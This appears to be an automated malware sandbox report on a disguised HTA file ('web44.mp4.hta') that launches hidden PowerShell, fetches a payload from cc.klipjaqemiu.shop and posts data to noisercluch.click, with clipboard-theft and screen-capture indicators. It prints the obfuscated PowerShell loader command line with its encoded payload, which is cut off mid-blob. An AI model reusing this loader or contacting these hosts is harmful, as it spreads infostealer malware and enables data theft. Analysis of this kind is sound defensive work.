Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /web.png HTTP/1.1Host: cc.klipjaqemiu.shopConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cc.klipjaqemiu.shop
Source: global traffic	DNS traffic detected: DNS query: noisercluch.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click

Source: mshta.exe, 00000000.00000003.1725019421.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725177020.0000000006692000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722082534.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725151894.000000000668F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1721997888.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1728590265.0000000006693000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1724065877.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722157514.000000000668A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cc.klipjaqemiu.shop
Source: powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2423169507.000000000096B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cc.klipjaqemiu.shop/web.png
Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1698936708.00000000004E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2888738105.0000000003688000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2889805623.0000000005931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/
Source: powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/api
Source: powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/api8)
Source: powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/api=
Source: powershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49918 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

9_2_00431B10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_05701000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

9_2_05701000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

9_2_00431B10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_00431D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

9_2_00431D10

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1F508 NtResumeThread,		4_2_06C1F508
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1F500 NtResumeThread,		4_2_06C1F500

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_008E2898	4_2_008E2898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_008E28A8	4_2_008E28A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_008E1F08	4_2_008E1F08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_008E1F18	4_2_008E1F18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD3370	4_2_06BD3370
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD36A7	4_2_06BD36A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD0006	4_2_06BD0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD4988	4_2_06BD4988
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BE2E58	4_2_06BE2E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BEFA33	4_2_06BEFA33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BEFA40	4_2_06BEFA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C0B790	4_2_06C0B790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C0B738	4_2_06C0B738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C071DB	4_2_06C071DB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C0E6F8	4_2_06C0E6F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C0B77F	4_2_06C0B77F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C035D1	4_2_06C035D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C035E0	4_2_06C035E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C00040	4_2_06C00040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C05868	4_2_06C05868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C05878	4_2_06C05878
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C00007	4_2_06C00007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C16980	4_2_06C16980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C18D45	4_2_06C18D45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C18D50	4_2_06C18D50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C19A8F	4_2_06C19A8F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C19A90	4_2_06C19A90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1697F	4_2_06C1697F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C47B48	4_2_06C47B48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C47B39	4_2_06C47B39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C40040	4_2_06C40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C40006	4_2_06C40006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C48018	4_2_06C48018
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C48028	4_2_06C48028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C46150	4_2_06C46150
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C46160	4_2_06C46160
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C60CD0	4_2_06C60CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C60CE0	4_2_06C60CE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043A0D0	9_2_0043A0D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004368A0	9_2_004368A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00426230	9_2_00426230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040D35C	9_2_0040D35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00436BF0	9_2_00436BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040E465	9_2_0040E465
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00421550	9_2_00421550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00415640	9_2_00415640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042BF45	9_2_0042BF45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00410F71	9_2_00410F71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00408720	9_2_00408720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041D840	9_2_0041D840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041A800	9_2_0041A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043A800	9_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043B813	9_2_0043B813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00419820	9_2_00419820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041683F	9_2_0041683F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043483C	9_2_0043483C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004220C0	9_2_004220C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004380C5	9_2_004380C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004460D5	9_2_004460D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004230E0	9_2_004230E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004270F9	9_2_004270F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00418095	9_2_00418095
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042C894	9_2_0042C894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043D140	9_2_0043D140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040B14F	9_2_0040B14F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00403960	9_2_00403960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00405970	9_2_00405970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040C97C	9_2_0040C97C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00435135	9_2_00435135
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004061D0	9_2_004061D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042C9DA	9_2_0042C9DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042C9E9	9_2_0042C9E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043E1F0	9_2_0043E1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042C984	9_2_0042C984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004259B0	9_2_004259B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00427A40	9_2_00427A40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043D240	9_2_0043D240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00414A50	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041C205	9_2_0041C205
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041720B	9_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00408A20	9_2_00408A20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041E230	9_2_0041E230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041AAE0	9_2_0041AAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042C289	9_2_0042C289
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00409290	9_2_00409290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00411A94	9_2_00411A94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040F2A0	9_2_0040F2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00417B75	9_2_00417B75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00404310	9_2_00404310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00431B10	9_2_00431B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0040AB20	9_2_0040AB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043D320	9_2_0043D320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042A3B0	9_2_0042A3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043D3B0	9_2_0043D3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043DBB0	9_2_0043DBB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00407440	9_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00428C46	9_2_00428C46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00404C50	9_2_00404C50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041DC50	9_2_0041DC50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043D450	9_2_0043D450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00423C60	9_2_00423C60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004164E0	9_2_004164E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004374F0	9_2_004374F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043E540	9_2_0043E540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041D560	9_2_0041D560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00421D10	9_2_00421D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043A510	9_2_0043A510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00427D94	9_2_00427D94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00425640	9_2_00425640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00406660	9_2_00406660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00419605	9_2_00419605
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004266C0	9_2_004266C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042FEC0	9_2_0042FEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004226D3	9_2_004226D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00437EA0	9_2_00437EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0043DEB0	9_2_0043DEB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00402F40	9_2_00402F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041F700	9_2_0041F700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00409710	9_2_00409710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0041DFC0	9_2_0041DFC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0042DFC3	9_2_0042DFC3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00435FF0	9_2_00435FF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00437790	9_2_00437790

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00414A40 appears 63 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00407FF0 appears 45 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3122
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3122			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@9/6@2/1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_00436BF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

9_2_00436BF0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4nnbc5p.qqi.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF6